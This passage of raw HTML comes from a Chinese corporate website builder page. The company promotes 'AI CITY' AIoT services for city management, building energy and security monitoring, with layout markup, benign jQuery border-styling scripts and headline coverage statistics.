</div> </div></div></div><div id="smv_con_160_22" ctype="area" smanim='{"delay":0.75,"duration":0.75,"direction":"Right","animationName":"slideIn","infinite":"1"}' class="esmartMargin smartAbs animated" cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_209_37" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 148px; width: 380px; left: 0px; top: 196px;z-index:7;"><div class="yibuFrameContent con_160_22 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_160_22"> <div id="smv_con_161_22" ctype="area" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_160_22" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 101px; width: 73px; left: 0px; top: 16px;z-index:7;"><div class="yibuFrameContent con_161_22 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_161_22"> <div id="smv_con_162_22" ctype="image" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_161_22" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 53px; width: 53px; left: 10px; top: 25px;z-index:2;"><div class="yibuFrameContent con_162_22 image_Style1 " style="overflow:visible;;"> <div class="w-image-box image-clip-wrap" data-filltype="0" id="div_con_162_22"> <a target="_self" href=""> <img src="static/picture/-48690.png" alt="" title="" id="img_smv_con_162_22" style="width: 51px; height:51px;" class=""> </a> </div> <script type="text/javascript"> $(function () { InitImageSmv("con_162_22", "51", "53", "0"); }); </script> </div></div> </div> </div></div></div><div id="smv_con_219_17" ctype="area" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_160_22" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 111px; width: 261px; left: 97px; top: 22px;z-index:10;"><div class="yibuFrameContent con_219_17 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_219_17"> <div id="smv_con_163_22" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item2" areaid="Area0" iscontainer="False" pvid="con_219_17" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 40px; width: 198px; left: 0px; top: 0px;z-index:8;"><div class="yibuFrameContent con_163_22 text_Style1 " style="overflow:hidden;;"><div id='txt_con_163_22' style="height: 100%;"> <div class="editableContent" id="txtc_con_163_22" style="height: 100%; word-wrap:break-word;"> <p><strong><span style="font-size:20px"><span style="color:#856dcc"><span style="font-family:Source Han Sans,Geneva,sans-serif">预警安防与任务布控</span></span></span></strong></p> </div> </div> <script> var tables = $(' #smv_con_163_22').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div><div id="smv_con_164_22" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item5" areaid="Area0" iscontainer="False" pvid="con_219_17" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 71px; width: 261px; left: 0px; top: 40px;z-index:9;"><div class="yibuFrameContent con_164_22 text_Style1 " style="overflow:hidden;;"><div id='txt_con_164_22' style="height: 100%;"> <div class="editableContent" id="txtc_con_164_22" style="height: 100%; word-wrap:break-word;"> <p style="text-align:justify"><span style="font-size:14px"><span style="color:#888888"><span style="line-height:1.75"><span style="font-family:Source Han Sans,Geneva,sans-serif">以舒适高效、节能低耗、安全智能的全案服务,让管理有序化、集约化、高效化。</span></span></span></span></p> </div> </div> <script> var tables = $(' #smv_con_164_22').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div> </div> </div></div></div> </div> </div></div></div> </div> </div></div></div> </div> </div></div></div></div> <div id="bannerWrap_con_170_31" class="fullcolumn-outer" style="position: absolute; top: 0; bottom: 0;"> </div> <script type="text/javascript"> $(function () { var resize = function () { $("#smv_con_170_31 >.yibuFrameContent>.fullcolumn-inner").width($("#smv_con_170_31").parent().width()); $('#bannerWrap_con_170_31').fullScreen(function (t) { if (VisitFromMobile()) { t.css("min-width", t.parent().width()) } }); } if (typeof (LayoutConverter) !== "undefined") { LayoutConverter.CtrlJsVariableList.push({ CtrlId: "con_170_31", ResizeFunc: resize, }); } else { $(window).resize(function (e) { if (e.target == this) { resize(); } }); } resize(); }); </script> </div></div><div id="smv_con_165_22" ctype="text" smanim='{"delay":0.75,"duration":0.75,"direction":"Up","animationName":"slideIn","infinite":"1"}' class="esmartMargin smartAbs animated" cpid="30536" cstyle="Style1" ccolor="Item4" areaid="" iscontainer="False" pvid="" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 46px; width: 899px; left: 150px; top: 2549px;z-index:6;"><div class="yibuFrameContent con_165_22 text_Style1 " style="overflow:hidden;;"><div id='txt_con_165_22' style="height: 100%;"> <div class="editableContent" id="txtc_con_165_22" style="height: 100%; word-wrap:break-word;"> <p style="text-align:center"><span style="color:#888888"><span style="line-height:1.75"><span style="font-size:14px"><span style="font-family:Source Han Sans,Geneva,sans-serif">以人工智能+物联网技术打造 AI CITY, 为政府、企业提供城市管理、建筑能源管理、环境与基础设施运营管理等一站式解决方案。</span></span></span></span></p> </div> </div> <script> var tables = $(' #smv_con_165_22').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div><div id="smv_con_166_22" ctype="area" smanim='{"delay":0.75,"duration":0.75,"direction":"","animationName":"zoomIn","infinite":"1"}' class="esmartMargin smartAbs animated" cpid="30536" cstyle="Style1" ccolor="Item0" areaid="" iscontainer="True" pvid="" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 201px; width: 685px; left: 257px; top: 2342px;z-index:0;"><div class="yibuFrameContent con_166_22 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_166_22"> <div id="smv_con_167_22" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_166_22" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 81px; width: 533px; left: 76px; top: 0px;z-index:2;"><div class="yibuFrameContent con_167_22 text_Style1 " style="overflow:hidden;;"><div id='txt_con_167_22' style="height: 100%;"> <div class="editableContent" id="txtc_con_167_22" style="height: 100%; word-wrap:break-word;"> <p style="text-align:center"><span style="color:#eeeeee"><span style="font-size:72px"><strong><span style="font-family:Arial Black">Advantage.</span></strong></span></span></p> </div> </div> <script> var tables = $(' #smv_con_167_22').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div><div id="smv_con_168_22" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item3" areaid="Area0" iscontainer="False" pvid="con_166_22" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 48px; width: 237px; left: 224px; top: 89px;z-index:3;"><div class="yibuFrameContent con_168_22 text_Style1 " style="overflow:hidden;;"><div id='txt_con_168_22' style="height: 100%;"> <div class="editableContent" id="txtc_con_168_22" style="height: 100%; word-wrap:break-word;"> <p style="text-align:center"><span style="color:#333333"><span style="font-size:36px"><strong><span style="font-family:Source Han Sans,Geneva,sans-serif">我们的优势</span></strong></span></span></p> </div> </div> <script> var tables = $(' #smv_con_168_22').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div><div id="smv_con_169_22" ctype="line" class="esmartMargin smartAbs " cpid="30536" cstyle="Style2" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_166_22" tareaid="" re-direction="y" daxis="All" isdeletable="True" style="height: 37px; width: 20px; left: 332px; top: 146px;z-index:1;"><div class="yibuFrameContent con_169_22 line_Style2 " style="overflow:visible;;"><!-- w-line --> <div style="position:relative; width:100%"> <div class="w-line" style="position:absolute;left:50%;" linetype="vertical"></div> </div> </div></div> </div> </div></div></div><div id="smv_con_187_18" ctype="banner" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="" iscontainer="True" pvid="" tareaid="" re-direction="y" daxis="Y" isdeletable="True" style="height: 587px; width: 100%; left: 0px; top: 850px;z-index:7;"><div class="yibuFrameContent con_187_18 banner_Style1 " style="overflow:visible;;"><div class="fullcolumn-inner smAreaC" id="smc_Area0" cid="con_187_18" style="width:1200px"> <div id="smv_con_188_18" ctype="area" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_187_18" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 145px; width: 306px; left: 2px; top: 65px;z-index:8;"><div class="yibuFrameContent con_188_18 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_188_18"> </div> </div></div></div><div id="smv_con_189_18" ctype="text" smanim='{"delay":0.75,"duration":0.75,"direction":"Down","animationName":"slideIn","infinite":"1"}' class="esmartMargin smartAbs animated" cpid="30536" cstyle="Style1" ccolor="Item4" areaid="Area0" iscontainer="False" pvid="con_187_18" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 80px; width: 1180px; left: 10px; top: 243px;z-index:5;"><div class="yibuFrameContent con_189_18 text_Style1 " style="overflow:hidden;;"><div id='txt_con_189_18' style="height: 100%;"> <div class="editableContent" id="txtc_con_189_18" style="height: 100%; word-wrap:break-word;"> <p style="text-align:justify"><span style="line-height:2"><span style="color:#666666"><span style="font-size:14px"><span style="font-family:Source Han Sans,Geneva,sans-serif">我们是新经济领域发展的核心战略平台,以人工智能+物联网技术打造 AI CITY, 为政府、企业提供城市管理、建筑能源管理、环境与基础设施运营管理等一站式解决方案。我们利用 AIoT(人工智能物联网)赋能传统行业,助力产业智能化升级,发展成为科技赛道企业。</span></span></span></span></p> </div> </div> <script> var tables = $(' #smv_con_189_18').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div><div id="smv_con_190_18" ctype="area" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_187_18" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 185px; width: 460px; left: 370px; top: 54px;z-index:11;"><div class="yibuFrameContent con_190_18 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_190_18"> <div id="smv_con_191_18" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item3" areaid="Area0" iscontainer="False" pvid="con_190_18" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 48px; width: 455px; left: 2px; top: 74px;z-index:3;"><div class="yibuFrameContent con_191_18 text_Style1 " style="overflow:hidden;;"><div id='txt_con_191_18' style="height: 100%;"> <div class="editableContent" id="txtc_con_191_18" style="height: 100%; word-wrap:break-word;"> <p style="text-align:center"><span style="font-size:36px"><strong><span style="font-family:Source Han Sans,Geneva,sans-serif">关于我们</span></strong></span></p> </div> </div> <script> var tables = $(' #smv_con_191_18').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div><div id="smv_con_192_18" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_190_18" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 70px; width: 460px; left: 0px; top: 0px;z-index:2;"><div class="yibuFrameContent con_192_18 text_Style1 " style="overflow:hidden;;"><div id='txt_con_192_18' style="height: 100%;"> <div class="editableContent" id="txtc_con_192_18" style="height: 100%; word-wrap:break-word;"> <p style="text-align:center"><span style="font-size:72px"><span style="color:#eeeeee"><strong><span style="font-family:Arial Black">About.</span></strong></span></span></p> </div> </div> <script> var tables = $(' #smv_con_192_18').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div><div id="smv_con_193_18" ctype="line" class="esmartMargin smartAbs " cpid="30536" cstyle="Style2" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_190_18" tareaid="" re-direction="y" daxis="All" isdeletable="True" style="height: 37px; width: 20px; left: 220px; top: 130px;z-index:1;"><div class="yibuFrameContent con_193_18 line_Style2 " style="overflow:visible;;"><!-- w-line --> <div style="position:relative; width:100%"> <div class="w-line" style="position:absolute;left:50%;" linetype="vertical"></div> </div> </div></div> </div> </div></div></div><div id="smv_con_194_18" ctype="area" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_187_18" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 214px; width: 1085px; left: 57px; top: 329px;z-index:7;"><div class="yibuFrameContent con_194_18 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_194_18"> <div id="smv_con_195_18" ctype="area" smanim='{"delay":0.75,"duration":0.75,"direction":"Down","animationName":"slideIn","infinite":"1"}' class="esmartMargin smartAbs animated" cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_194_18" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 214px; width: 340px; left: 0px; top: 0px;z-index:6;"><div class="yibuFrameContent con_195_18 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_195_18"> <div id="smv_con_196_18" ctype="image" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_195_18" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 56px; width: 56px; left: 0px; top: 0px;z-index:2;"><div class="yibuFrameContent con_196_18 image_Style1 " style="overflow:visible;;"> <div class="w-image-box image-clip-wrap" data-filltype="0" id="div_con_196_18"> <a target="_self" href=""> <img src="static/picture/-48612.png" alt="" title="" id="img_smv_con_196_18" style="width: 54px; height:54px;" class=""> </a> </div> <script type="text/javascript"> $(function () { InitImageSmv("con_196_18", "54", "56", "0"); }); </script> </div></div><div id="smv_con_197_18" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_195_18" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 32px; width: 132px; left: 0px; top: 157px;z-index:3;"><div class="yibuFrameContent con_197_18 text_Style1 " style="overflow:hidden;;"><div id='txt_con_197_18' style="height: 100%;"> <div class="editableContent" id="txtc_con_197_18" style="height: 100%; word-wrap:break-word;"> <p><span style="font-size:16px"><span style="color:#666666"><span style="font-family:Source Han Sans,Geneva,sans-serif">连接数据节点</span></span></span></p> </div> </div> <script> var tables = $(' #smv_con_197_18').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div><div id="smv_con_198_18" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_195_18" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 81px; width: 340px; left: 0px; top: 69px;z-index:0;"><div class="yibuFrameContent con_198_18 text_Style1 " style="overflow:hidden;;"><div id='txt_con_198_18' style="height: 100%;"> <div class="editableContent" id="txtc_con_198_18" style="height: 100%; word-wrap:break-word;"> <p><span style="font-size:62px"><span style="color:#856dcc"><span style="font-family:Arial,Helvetica,sans-serif">50,000</span></span></span></p> </div> </div> <script> var tables = $(' #smv_con_198_18').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div> </div> </div></div></div><div id="smv_con_199_18" ctype="area" smanim='{"delay":0.75,"duration":0.75,"direction":"Up","animationName":"slideIn","infinite":"1"}' class="esmartMargin smartAbs animated" cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_194_18" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 214px; width: 340px; left: 372px; top: 0px;z-index:6;"><div class="yibuFrameContent con_199_18 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_199_18"> <div id="smv_con_200_18" ctype="image" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_199_18" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 56px; width: 56px; left: 0px; top: 0px;z-index:2;"><div class="yibuFrameContent con_200_18 image_Style1 " style="overflow:visible;;"> <div class="w-image-box image-clip-wrap" data-filltype="0" id="div_con_200_18"> <a target="_self" href=""> <img src="static/picture/-48614.png" alt="" title="" id="img_smv_con_200_18" style="width: 54px; height:54px;" class=""> </a> </div> <script type="text/javascript"> $(function () { InitImageSmv("con_200_18", "54", "56", "0"); }); </script> </div></div><div id="smv_con_201_18" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_199_18" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 32px; width: 132px; left: 0px; top: 157px;z-index:3;"><div class="yibuFrameContent con_201_18 text_Style1 " style="overflow:hidden;;"><div id='txt_con_201_18' style="height: 100%;"> <div class="editableContent" id="txtc_con_201_18" style="height: 100%; word-wrap:break-word;"> <p><span style="font-size:16px"><span style="color:#666666"><span style="font-family:Source Han Sans,Geneva,sans-serif">覆盖人口</span></span></span></p> </div> </div> <script> var tables = $(' #smv_con_201_18').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div><div id="smv_con_202_18" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_199_18" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 81px; width: 340px; left: 0px; top: 69px;z-index:0;"><div class="yibuFrameContent con_202_18 text_Style1 " style="overflow:hidden;;"><div id='txt_con_202_18' style="height: 100%;"> <div class="editableContent" id="txtc_con_202_18" style="height: 100%; word-wrap:break-word;"> <p><span style="font-size:62px"><span style="color:#856dcc"><span style="font-family:Arial,Helvetica,sans-serif">20,000</span></span></span></p> </div> </div> <script> var tables = $(' #smv_con_202_18').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div> </div> </div></div></div><div id="smv_con_203_18" ctype="area" smanim='{"delay":0.75,"duration":0.75,"direction":"Down","animationName":"slideIn","infinite":"1"}' class="esmartMargin smartAbs animated" cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_194_18" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 214px; width: 340px; left: 745px; top: 0px;z-index:6;"><div class="yibuFrameContent con_203_18 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_203_18"> <div id="smv_con_204_18" ctype="image" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_203_18" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 56px; width: 56px; left: 0px; top: 0px;z-index:2;"><div class="yibuFrameContent con_204_18 image_Style1 " style="overflow:visible;;"> <div class="w-image-box image-clip-wrap" data-filltype="0" id="div_con_204_18"> <a target="_self" href=""> <img src="static/picture/-48615.png" alt="" title="" id="img_smv_con_204_18" style="width: 54px; height:54px;" class=""> </a> </div> <script type="text/javascript"> $(function () { InitImageSmv("con_204_18", "54", "56", "0"); }); </script> </div></div><div id="smv_con_205_18" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_203_18" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 32px; width: 132px; left: 0px; top: 157px;z-index:3;"><div class="yibuFrameContent con_205_18 text_Style1 " style="overflow:hidden;;"><div id='txt_con_205_18' style="height: 100%;"> <div class="editableContent" id="txtc_con_205_18" style="height: 100%; word-wrap:break-word;"> <p><span style="font-size:16px"><span style="color:#666666"><span style="font-family:Source Han Sans,Geneva,sans-serif">覆盖面积(m²)</span></span></span></p> </div> </div> <script> var tables = $(' #smv_con_205_18').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div><div id="smv_con_206_18" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_203_18" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 81px; width: 340px; left: 0px; top: 69px;z-index:0;"><div class="yibuFrameContent con_206_18 text_Style1 " style="overflow:hidden;;"><div id='txt_con_206_18' style="height: 100%;"> <div class="editableContent" id="txtc_con_206_18" style="height: 100%; word-wrap:break-word;"> <p><span style="font-size:62px"><span style="color:#856dcc"><span style="font-family:Arial,Helvetica,sans-serif">80,000</span></span></span></p> </div> </div> <script> var tables = $(' #smv_con_206_18').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div> </div> </div></div></div> </div> </div></div></div></div> <div id="bannerWrap_con_187_18" class="fullcolumn-outer" style="position: absolute; top: 0; bottom: 0;"> </div> <script type="text/javascript"> $(function () { var resize = function () { $("#smv_con_187_18 >.yibuFrameContent>.fullcolumn-inner").width($("#smv_con_187_18").parent().width()); $('#bannerWrap_con_187_18').fullScreen(function (t) { if (VisitFromMobile()) { t.css("min-width", t.parent().width()) } }); } if (typeof (LayoutConverter) !== "undefined") { LayoutConverter.CtrlJsVariableList.push({ CtrlId: "con_187_18", ResizeFunc: resize, }); } else { $(window).resize(function (e) { if (e.target == this) { resize(); } }); } resize(); }); </script> </div></div></div></div><input type='hidden' name='__RequestVerificationToken' id='token__RequestVerificationToken' value='of8Pu0-2U1RHSbmhgps9GMWjGU5J4FToWbRyrVWZCO9EmkUO3sQz10ydpLROyNFsccR6cyK_DVaJv3sbPMGusdYhjjT_y1uqX_BT8Q4sI3Y1'> </div> </div> </div> <div style="background-color: rgb(68, 68, 68); background-image: none; background-repeat: no-repeat;background-position:0 0; background:-moz-linear-gradient(top, none, none);background:-webkit-gradient(linear, left top, left bottom, from(none), to(none));background:-o-linear-gradient(top, none, none);background:-ms-linear-gradient(top, none, none);background:linear-gradient(top, none, none);; position: relative; width: 100%;min-width:1200px;background-size: auto;" bgscroll="none"> <div class=" footer" cpid="30459" id="smv_Area3" style="width: 1200px; height: 50px; position: relative; margin: 0 auto;"> <div id="smv_tem_73_20" ctype="banner" class="esmartMargin smartAbs " cpid="30459" cstyle="Style1" ccolor="Item0" areaid="Area3" iscontainer="True" pvid="" tareaid="Area3" re-direction="y" daxis="Y" isdeletable="True" style="height: 50px; width: 100%; left: 0px; top: 1px;z-index:5;"><div class="yibuFrameContent tem_73_20 banner_Style1 " style="overflow:visible;;"><div class="fullcolumn-inner smAreaC" id="smc_Area0" cid="tem_73_20" style="width:1200px"> <div id="smv_tem_74_40" 